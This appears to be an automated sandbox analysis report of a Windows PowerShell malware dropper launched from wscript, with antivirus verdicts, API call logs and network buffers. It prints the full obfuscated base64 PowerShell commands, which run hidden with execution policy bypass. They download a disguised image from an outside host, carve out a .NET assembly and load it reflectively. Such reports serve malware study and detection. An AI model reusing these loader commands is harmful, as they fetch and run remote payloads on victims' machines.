UWCcUzBkdICcShUWCcUzBkdIYwB1ShUWCcUzBkdICcShUWCcUzBkdIKQShUWCcUzBkdIpShUWCcUzBkdIShUWCcUzBkdI==';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('ShUWCcUzBkdI','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
filepath: powershell
1 1 0

CreateProcessInternalW

 thread_identifier: 2232
thread_handle: 0x00000450
process_identifier: 2228
current_directory: C:\Users\test22\AppData\Local\Temp
filepath:
track: 1
command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://uploaddeimagens.com.br/images/004/634/676/original/rumpe.jpg?1697053529';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('dHh0LjQ2ZXNhYmVsaWZkZXRhZHB1ZGlvcmRkZW1tYWhvbS80NzEuNzMuNDUyLjU4MS8vOnB0dGg=' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dadsa' , 'de' , 'cu'))"
filepath_r:
stack_pivoted: 0
creation_flags: 0 ()
inherit_handles: 1
process_handle: 0x00000454
1 1 0
Symantec ISB.Downloader!gen40
Avast Script:SNH-gen [Trj]
Kaspersky HEUR:Trojan.VBS.SAgent.gen
Varist VBS/Agent.BFC!Eldorado
ZoneAlarm HEUR:Trojan.VBS.SAgent.gen
Google Detected
AVG Script:SNH-gen [Trj]
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

 flags: 15
family: 0
111 0
Data received [
Data received We<Ý"=±Å¿þlJ_ÖhWFIpðæDOWNGRD '”­ jC…_ÿá'šˆ'GËf ÁãòŠ.}ŸŽ“õÀ ÿ 
Data received Q
Data received “
Data received AF¯”Bi¤8¼MG@Ê>Hð¡@oÅöbnz%ã¶}åóà°ÐÀ#؝/LËjwxžˆ™Ø‹Ìy_¸x‰H0F!ÜZ ±v f)âɬ·”V–±»ˆ/Ró—Óùò!Œ9Í)GìÑ öqÂ{3™@Ö,8‡ç ©‹,ôöªðr
Data received 
Data received 
Data received 
Data received 
Data received 0
Data received µe['³-J*ÎÀÇç}$‡œWoqÃýˆû**QQՄ.Ý©U4Ñëø6æþ…J-
Data sent yue<Ý Ùö¹É¿j‚(m‹M8GÑ·¹™(AýE#¨/5 ÀÀÀ À 284ÿuploaddeimagens.com.br  
Data sent FBAFm¶L3Û¥º_…{0{ r±¼>¹oÏ܆ ¾#©Y×ù»ñŽ†<ùC0‰/zÌH7Òs‰r“œï0wA×;ç†ÖpJMF6^¬ª†ÓÊp¢D‰²jèî Š|3µ$µ³’RœtÂ\
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0
Time & API Arguments Status Return Repeated

WSASend

 buffer: kge<ÝXXAj¶ÎÚoÁ_÷ÊP%lÑbq}CY[ ݹ/5 ÀÀÀ À 28&ÿ paste.ee  
socket: 968
0 0

WSASend

 buffer: FBA4¡ ¿ãԈ7¬êVþmŽq¨ðù*Åæ‘—ÕÓÍQdè¿Xq0í NôëM–Sg +ØquZ8.¬åJ`ñºE0RÌ>(q‘ñeš¬£²·âÙ}\ŒóæC†t®@‡ŠÍÂùÚû zŸ@öô ¡¤ç´\
socket: 968
0 0

WSASend

 buffer: À¶YÍxžï[ڎ˗ }y¹ƒõ!½5 ­ö†Áƒ]xiÜupÈìHhÝÐ IKˊ[^¤D¢>çýgΰÿÜם +’¤$ °àÈ]î Uå‹ëÇŪPAš`ÀÏ1íѥӚ‹'˜Õ9^f„_¬Ð¹,ìÙ}¦–]Ž©23…“tHƒµ1ä½ô¯F½Ä>®Öw ãxz2µŽ¡†Ô¤ŸfXË^oB ±½#wM¦x8[™¨1—u~6ø›EÉv¦V$
socket: 968
0 0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F81F111D0E5AB58D396F7BF525577FD30FDC95AA\Blob
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\18F7C1FCC3090203FD5BAA2F861A754976C8DD25\Blob
Time & API Arguments Status Return Repeated

WSASend

 buffer: kge<ÝXXAj¶ÎÚoÁ_÷ÊP%lÑbq}CY[ ݹ/5 ÀÀÀ À 28&ÿ paste.ee  
socket: 968
0 0

WSASend

 buffer: FBA4¡ ¿ãԈ7¬êVþmŽq¨ðù*Åæ‘—ÕÓÍQdè¿Xq0í NôëM–Sg +ØquZ8.¬åJ`ñºE0RÌ>(q‘ñeš¬£²·âÙ}\ŒóæC†t®@‡ŠÍÂùÚû zŸ@öô ¡¤ç´\
socket: 968
0 0

WSASend

 buffer: À¶YÍxžï[ڎ˗ }y¹ƒõ!½5 ­ö†Áƒ]xiÜupÈìHhÝÐ IKˊ[^¤D¢>çýgΰÿÜם +’¤$ °àÈ]î Uå‹ëÇŪPAš`ÀÏ1íѥӚ‹'˜Õ9^f„_¬Ð¹,ìÙ}¦–]Ž©23…“tHƒµ1ä½ô¯F½Ä>®Öw ãxz2µŽ¡†Ô¤ŸfXË^oB ±½#wM¦x8[™¨1—u~6ø›EÉv¦V$
socket: 968
0 0

send

 buffer: yue<Ý Ùö¹É¿j‚(m‹M8GÑ·¹™(AýE#¨/5 ÀÀÀ À 284ÿuploaddeimagens.com.br  
socket: 1444
sent: 126
1 126 0

send

 buffer: FBAFm¶L3Û¥º_…{0{ r±¼>¹oÏ܆ ¾#©Y×ù»ñŽ†<ùC0‰/zÌH7Òs‰r“œï0wA×;ç†ÖpJMF6^¬ª†ÓÊp¢D‰²jèî Š|3µ$µ³’RœtÂ\
socket: 1444
sent: 134
1 134 0

WSASend

 buffer: GET /roots/dstrootcax3.p7c HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Microsoft-CryptoAPI/6.1 Host: apps.identrust.com
socket: 2020
0 0
parent_process wscript.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = '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CcUzBkdIZQB4ShUWCcUzBkdIE8ShUWCcUzBkdIZgShUWCcUzBkdIoShUWCcUzBkdICQShUWCcUzBkdIZQBuShUWCcUzBkdIGQShUWCcUzBkdIRgBsShUWCcUzBkdIGEShUWCcUzBkdIZwShUWCcUzBkdIpShUWCcUzBkdIDsShUWCcUzBkdIJShUWCcUzBkdIBzShUWCcUzBkdIHQShUWCcUzBkdIYQByShUWCcUzBkdIHQShUWCcUzBkdISQBuShUWCcUzBkdIGQShUWCcUzBkdIZQB4ShUWCcUzBkdICShUWCcUzBkdIShUWCcUzBkdILQBnShUWCcUzBkdIGUShUWCcUzBkdIIShUWCcUzBkdIShUWCcUzBkdIwShUWCcUzBkdICShUWCcUzBkdIShUWCcUzBkdILQBhShUWCcUzBkdIG4ShUWCcUzBkdIZShUWCcUzBkdIShUWCcUzBkdIgShUWCcUzBkdICQShUWCcUzBkdIZQBuShUWCcUzBkdIGQShUWCcUzBkdISQBuShUWCcUzBkdIGQShUWCcUzBkdIZQB4ShUWCcUzBkdICShUWCcUzBkdIShUWCcUzBkdILQBnShUWCcUzBkdIHQShUWCcUzBkdIIShUWCcUzBkdIShUWCcUzBkdIkShUWCcUzBkdIHMShUWCcUzBkdIdShUWCcUzBkdIBhShUWCcUzBkdIHIShUWCcUzBkdIdShUWCcUzBkdIBJShUWCcUzBkdIG4ShUWCcUzBkdIZShUWCcUzBkdIBlShUWCcUzBkdIHgShUWCcUzBkdIOwShUWCcUzBkdIkShUWCcUzBkdIHMShUWCcUzBkdIdShUWCcUzBkdIBhShUWCcUzBkdIHIShUWCcUzBkdIdShUWCcUzBkdIBJShUWCcUzBkdIG4ShUWCcUzBkdIZShUWCcUzBkdIBlShUWCcUzBkdIHgShUWCcUzBkdIIShUWCcUzBkdIShUWCcUzBkdIrShUWCcUzBkdID0ShUWCcUzBkdIIShUWCcUzBkdIShUWCcUzBkdIkShUWCcUzBkdIHMShUWCcUzBkdIdShUWCcUzBkdIBhShUWCcUzBkdIHIShUWCcUzBkdIdShUWCcUzBkdIBGShUWCcUzBkdIGwShUWCcUzBkdIYQBnShUWCcUzBkdIC4ShUWCcUzBkdITShUWCcUzBkdIBlShUWCcUzBkdIG4ShUWCcUzBkdIZwB0ShUWCcUzBkdIGgShUWCcUzBkdIOwShUWCcUzBkdIkShUWCcUzBkdIGIShUWCcUzBkdIYQBzShUWCcUzBkdIGUShUWCcUzBkdINgShUWCcUzBkdI0ShUWCcUzBkdIEwShUWCcUzBkdIZQBuShUWCcUzBkdIGcShUWCcUzBkdIdShUWCcUzBkdIBoShUWCcUzBkdICShUWCcUzBkdIShUWCcUzBkdIPQShUWCcUzBkdIgShUWCcUzBkdICQShUWCcUzBkdIZQBuShUWCcUzBkdIGQShUWCcUzBkdISQBuShUWCcUzBkdIGQShUWCcUzBkdIZQB4ShUWCcUzBkdICShUWCcUzBkdIShUWCcUzBkdILQShUWCcUzBkdIgShUWCcUzBkdICQShUWCcUzBkdIcwB0ShUWCcUzBkdIGEShUWCcUzBkdIcgB0ShUWCcUzBkdIEkShUWCcUzBkdIbgBkShUWCcUzBkdIGUShUWCcUzBkdIeShUWCcUzBkdIShUWCcUzBkdI7ShUWCcUzBkdICQShUWCcUzBkdIYgBhShUWCcUzBkdIHMShUWCcUzBkdIZQShUWCcUzBkdI2ShUWCcUzBkdIDQShUWCcUzBkdIQwBvShUWCcUzBkdIG0ShUWCcUzBkdIbQBhShUWCcUzBkdIG4ShUWCcUzBkdIZShUWCcUzBkdIShUWCcUzBkdIgShUWCcUzBkdID0ShUWCcUzBkdIIShUWCcUzBkdIShUWCcUzBkdIkShUWCcUzBkdIGkShUWCcUzBkdIbQBhShUWCcUzBkdIGcShUWCcUzBkdIZQBUShUWCcUzBkdIGUShUWCcUzBkdIeShUWCcUzBkdIB0ShUWCcUzBkdIC4ShUWCcUzBkdIUwB1ShUWCcUzBkdIGIShUWCcUzBkdIcwB0ShUWCcUzBkdIHIShUWCcUzBkdIaQBuShUWCcUzBkdIGcShUWCcUzBkdIKShUWCcUzBkdIShUWCcUzBkdIkShUWCcUzBkdIHMShUWCcUzBkdIdShUWCcUzBkdIBhShUWCcUzBkdIHIShUWCcUzBkdIdShUWCcUzBkdIBJShUWCcUzBkdIG4ShUWCcUzBkdIZShUWCcUzBkdIBlShUWCcUzBkdIHgShUWCcUzBkdILShUWCcUzBkdIShUWCcUzBkdIgShUWCcUzBkdICQShUWCcUzBkdIYgBhShUWCcUzBkdIHMShUWCcUzBkdIZQShUWCcUzBkdI2ShUWCcUzBkdIDQShUWCcUzBkdITShUWCcUzBkdIBlShUWCcUzBkdIG4ShUWCcUzBkdIZwB0ShUWCcUzBkdIGgShUWCcUzBkdIKQShUWCcUzBkdI7ShUWCcUzBkdICQShUWCcUzBkdIYwBvShUWCcUzBkdIG0ShUWCcUzBkdIbQBhShUWCcUzBkdIG4ShUWCcUzBkdIZShUWCcUzBkdIBCShUWCcUzBkdIHkShUWCcUzBkdIdShUWCcUzBkdIBlShUWCcUzBkdIHMShUWCcUzBkdIIShUWCcUzBkdIShUWCcUzBkdI9ShUWCcUzBkdICShUWCcUzBkdIShUWCcUzBkdIWwBTShUWCcUzBkdIHkShUWCcUzBkdIcwB0ShUWCcUzBkdIGUShUWCcUzBkdIbQShUWCcUzBkdIuShUWCcUzBkdIEMShUWCcUzBkdIbwBuShUWCcUzBkdIHYShUWCcUzBkdIZQByShUWCcUzBkdIHQShUWCcUzBkdIXQShUWCcUzBkdI6ShUWCcUzBkdIDoShUWCcUzBkdIRgByShUWCcUzBkdIG8ShUWCcUzBkdIbQBCShUWCcUzBkdIGEShUWCcUzBkdIcwBlShUWCcUzBkdIDYShUWCcUzBkdINShUWCcUzBkdIBTShUWCcUzBkdIHQShUWCcUzBkdIcgBpShUWCcUzBkdIG4ShUWCcUzBkdIZwShUWCcUzBkdIoShUWCcUzBkdICQShUWCcUzBkdIYgBhShUWCcUzBkdIHMShUWCcUzBkdIZQShUWCcUzBkdI2ShUWCcUzBkdIDQShUWCcUzBkdIQwBvShUWCcUzBkdIG0ShUWCcUzBkdIbQBhShUWCcUzBkdIG4ShUWCcUzBkdIZShUWCcUzBkdIShUWCcUzBkdIpShUWCcUzBkdIDsShUWCcUzBkdIJShUWCcUzBkdIBsShUWCcUzBkdIG8ShUWCcUzBkdIYQBkShUWCcUzBkdIGUShUWCcUzBkdIZShUWCcUzBkdIBBShUWCcUzBkdIHMShUWCcUzBkdIcwBlShUWCcUzBkdIG0ShUWCcUzBkdIYgBsShUWCcUzBkdIHkShUWCcUzBkdIIShUWCcUzBkdIShUWCcUzBkdI9ShUWCcUzBkdICShUWCcUzBkdIShUWCcUzBkdIWwBTShUWCcUzBkdIHkShUWCcUzBkdIcwB0ShUWCcUzBkdIGUShUWCcUzBkdIbQShUWCcUzBkdIuShUWCcUzBkdIFIShUWCcUzBkdIZQBmShUWCcUzBkdIGwShUWCcUzBkdIZQBjShUWCcUzBkdIHQShUWCcUzBkdIaQBvShUWCcUzBkdIG4ShUWCcUzBkdILgBBShUWCcUzBkdIHMShUWCcUzBkdIcwBlShUWCcUzBkdIG0ShUWCcUzBkdIYgBsShUWCcUzBkdIHkShUWCcUzBkdIXQShUWCcUzBkdI6ShUWCcUzBkdIDoShUWCcUzBkdITShUWCcUzBkdIBvShUWCcUzBkdIGEShUWCcUzBkdIZShUWCcUzBkdIShUWCcUzBkdIoShUWCcUzBkdICQShUWCcUzBkdIYwBvShUWCcUzBkdIG0ShUWCcUzBkdIbQBhShUWCcUzBkdIG4ShUWCcUzBkdIZShUWCcUzBkdIBCShUWCcUzBkdIHkShUWCcUzBkdIdShUWCcUzBkdIBlShUWCcUzBkdIHMShUWCcUzBkdIKQShUWCcUzBkdI7ShUWCcUzBkdICQShUWCcUzBkdIdShUWCcUzBkdIB5ShUWCcUzBkdIHShUWCcUzBkdIShUWCcUzBkdIZQShUWCcUzBkdIgShUWCcUzBkdID0ShUWCcUzBkdIIShUWCcUzBkdIShUWCcUzBkdIkShUWCcUzBkdIGwShUWCcUzBkdIbwBhShUWCcUzBkdIGQShUWCcUzBkdIZQBkShUWCcUzBkdIEEShUWCcUzBkdIcwBzShUWCcUzBkdIGUShUWCcUzBkdIbQBiShUWCcUzBkdIGwShUWCcUzBkdIeQShUWCcUzBkdIuShUWCcUzBkdIEcShUWCcUzBkdIZQB0ShUWCcUzBkdIFQShUWCcUzBkdIeQBwShUWCcUzBkdIGUShUWCcUzBkdIKShUWCcUzBkdIShUWCcUzBkdInShUWCcUzBkdIEYShUWCcUzBkdIaQBiShUWCcUzBkdIGUShUWCcUzBkdIcgShUWCcUzBkdIuShUWCcUzBkdIEgShUWCcUzBkdIbwBtShUWCcUzBkdIGUShUWCcUzBkdIJwShUWCcUzBkdIpShUWCcUzBkdIDsShUWCcUzBkdIJShUWCcUzBkdIBtShUWCcUzBkdIGUShUWCcUzBkdIdShUWCcUzBkdIBoShUWCcUzBkdIG8ShUWCcUzBkdIZShUWCcUzBkdIShUWCcUzBkdIgShUWCcUzBkdID0ShUWCcUzBkdIIShUWCcUzBkdIShUWCcUzBkdIkShUWCcUzBkdIHQShUWCcUzBkdIeQBwShUWCcUzBkdIGUShUWCcUzBkdILgBHShUWCcUzBkdIGUShUWCcUzBkdIdShUWCcUzBkdIBNShUWCcUzBkdIGUShUWCcUzBkdIdShUWCcUzBkdIBoShUWCcUzBkdIG8ShUWCcUzBkdIZShUWCcUzBkdIShUWCcUzBkdIoShUWCcUzBkdICcShUWCcUzBkdIVgBBShUWCcUzBkdIEkShUWCcUzBkdIJwShUWCcUzBkdIpShUWCcUzBkdIC4ShUWCcUzBkdISQBuShUWCcUzBkdIHYShUWCcUzBkdIbwBrShUWCcUzBkdIGUShUWCcUzBkdIKShUWCcUzBkdIShUWCcUzBkdIkShUWCcUzBkdIG4ShUWCcUzBkdIdQBsShUWCcUzBkdIGwShUWCcUzBkdILShUWCcUzBkdIShUWCcUzBkdIgShUWCcUzBkdIFsShUWCcUzBkdIbwBiShUWCcUzBkdIGoShUWCcUzBkdIZQBjShUWCcUzBkdIHQShUWCcUzBkdIWwBdShUWCcUzBkdIF0ShUWCcUzBkdIIShUWCcUzBkdIShUWCcUzBkdIoShUWCcUzBkdICcShUWCcUzBkdIZShUWCcUzBkdIBIShUWCcUzBkdIGgShUWCcUzBkdIMShUWCcUzBkdIBMShUWCcUzBkdIGoShUWCcUzBkdIUQShUWCcUzBkdIyShUWCcUzBkdIFoShUWCcUzBkdIWShUWCcUzBkdIBOShUWCcUzBkdIGgShUWCcUzBkdIWQBtShUWCcUzBkdIFYShUWCcUzBkdIcwBhShUWCcUzBkdIFcShUWCcUzBkdIWgBrShUWCcUzBkdIFoShUWCcUzBkdIWShUWCcUzBkdIBSShUWCcUzBkdIGgShUWCcUzBkdIWgBIShUWCcUzBkdIEIShUWCcUzBkdIMQBaShUWCcUzBkdIEcShUWCcUzBkdIbShUWCcUzBkdIB2ShUWCcUzBkdIGMShUWCcUzBkdIbQBSShUWCcUzBkdIGsShUWCcUzBkdIWgBXShUWCcUzBkdIDEShUWCcUzBkdIdShUWCcUzBkdIBZShUWCcUzBkdIFcShUWCcUzBkdIaShUWCcUzBkdIB2ShUWCcUzBkdIGIShUWCcUzBkdIUwShUWCcUzBkdI4ShUWCcUzBkdIDShUWCcUzBkdIShUWCcUzBkdITgB6ShUWCcUzBkdIEUShUWCcUzBkdIdQBOShUWCcUzBkdIHoShUWCcUzBkdITQB1ShUWCcUzBkdIE4ShUWCcUzBkdIRShUWCcUzBkdIBVShUWCcUzBkdIHkShUWCcUzBkdITShUWCcUzBkdIBqShUWCcUzBkdIFUShUWCcUzBkdINShUWCcUzBkdIBNShUWCcUzBkdIFMShUWCcUzBkdIOShUWCcUzBkdIB2ShUWCcUzBkdIE8ShUWCcUzBkdIbgBCShUWCcUzBkdIDShUWCcUzBkdIShUWCcUzBkdIZShUWCcUzBkdIBHShUWCcUzBkdIGcShUWCcUzBkdIPQShUWCcUzBkdInShUWCcUzBkdICShUWCcUzBkdIShUWCcUzBkdILShUWCcUzBkdIShUWCcUzBkdIgShUWCcUzBkdICcShUWCcUzBkdIZShUWCcUzBkdIBmShUWCcUzBkdIGQShUWCcUzBkdIZgBkShUWCcUzBkdICcShUWCcUzBkdIIShUWCcUzBkdIShUWCcUzBkdIsShUWCcUzBkdICShUWCcUzBkdIShUWCcUzBkdIJwBkShUWCcUzBkdIGYShUWCcUzBkdIZShUWCcUzBkdIBmShUWCcUzBkdICcShUWCcUzBkdIIShUWCcUzBkdIShUWCcUzBkdIsShUWCcUzBkdICShUWCcUzBkdIShUWCcUzBkdIJwBkShUWCcUzBkdIGYShUWCcUzBkdIZShUWCcUzBkdIBmShUWCcUzBkdICcShUWCcUzBkdIIShUWCcUzBkdIShUWCcUzBkdIsShUWCcUzBkdICShUWCcUzBkdIShUWCcUzBkdIJwBkShUWCcUzBkdIGEShUWCcUzBkdIZShUWCcUzBkdIBzShUWCcUzBkdIGEShUWCcUzBkdIJwShUWCcUzBkdIgShUWCcUzBkdICwShUWCcUzBkdIIShUWCcUzBkdIShUWCcUzBkdInShUWCcUzBkdIGQShUWCcUzBkdIZQShUWCcUzBkdInShUWCcUzBkdICShUWCcUzBkdIShUWCcUzBkdILShUWCcUzBkdIShUWCcUzBkdIgShUWCcUzBkdICcShUWCcUzBkdIYwB1ShUWCcUzBkdICcShUWCcUzBkdIKQShUWCcUzBkdIpShUWCcUzBkdIShUWCcUzBkdI==';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('ShUWCcUzBkdI','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
